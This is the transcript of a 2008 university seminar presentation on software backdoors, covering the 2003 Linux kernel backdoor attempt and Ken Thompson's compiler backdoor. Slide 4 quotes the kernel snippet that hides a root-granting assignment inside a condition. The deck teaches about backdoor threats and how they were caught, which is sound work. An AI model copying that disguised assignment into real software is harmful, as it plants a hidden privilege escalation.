1 / 17

Unveiling Backdoors: Insights from Software Engineering Seminar

Learn about backdoor mechanisms in software, real examples like Linux Kernel attempts, and how to detect and prevent them. Explore compiler backdoors introduced by Ken Thompson in 1984. Sources included for further reading.

vanna
Download Presentation

Unveiling Backdoors: Insights from Software Engineering Seminar

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. BACKDOORS in Software January 2008 Eino Malinen Seminar on Software Engineering @ University of Turku

  2. Definition and Introduction • unwanted software mechanism introduced into part of the system to provide an easy access • attacker has created the mechanism earlier and wants to use it sometime later • mechanism can be injected • from outside: malware send through network • on-site: hard coded into software • two examples of actual backdoors

  3. Backdoor Attempt in Linux Kernel • happened in November 2003 • change in a kernel source file kernel/exit.c • person noticing this first focused on the annoyance of using manual modification • peers queried more about the change

  4. Backdoor Attempt in Linux Kernel • following piece of code was added: • if ((options == (__WCLONE|__WALL)) && • (current->uid = 0))retval = -EINVAL; • effectively this means that with flags __WCLONE and __WALL on current user gets root permissions • lax review might think the latter as an evaluation of condition instead of assignment • extra parenthesis avoid compile warnings

  5. Backdoor Attempt in Linux Kernel • the attempt came to daylight because the file in question was under automatic control of modifications • fellow developers were active enough to ask about the changes

  6. Backdoors in Compilers • introduced by Ken Thompson in 1984 • prerequisite concepts for compiler backdoor • self-replicating program • program outputs its own source code • also known as quine

  7. Backdoors in Compilers • prerequisite concepts for compiler backdoor • self-replicating program • program outputs its own source code • also known as quine • training programs • adding new feature to program • e.g. to recognize new escaped symbol

  8. Backdoors in Compilers • phases of injecting backdoor into compiler • add backdoor to compiler source code • to compile backdoor in login command • add another backdoor to compiler source code • to insert this as self-replicating code and login backdoor to compiler source code

  9. Backdoors in Compilers • backdoor was tested on friendly victim • disassembler was also rigged to fail the diassembling of object code

  10. Sources • Jeremy. Linux: Kernel “Back Door” Attempt. http://kerneltrap.org/node/view/1584 • Poulsen. Thwarted Linux backdoor hints at smarter hackers. http://www.securityfocus.com/news/7388 • Thompson, Reflections on Trusting Trust. Communications of the ACM. Vol. 27, Issue 8 (Aug. 1984), pages 761-763 • Skoudis & Zeltser. Malware: Fighting Malicious Code. • Schneier. Countering "Trusting Trust". http://www.schneier.com/blog/archives/2006/01/countering_trus.html • Zhang & Paxson. Detecting Backdoors. http://www.icir.org/vern/papers/backdoor/index.html

More Related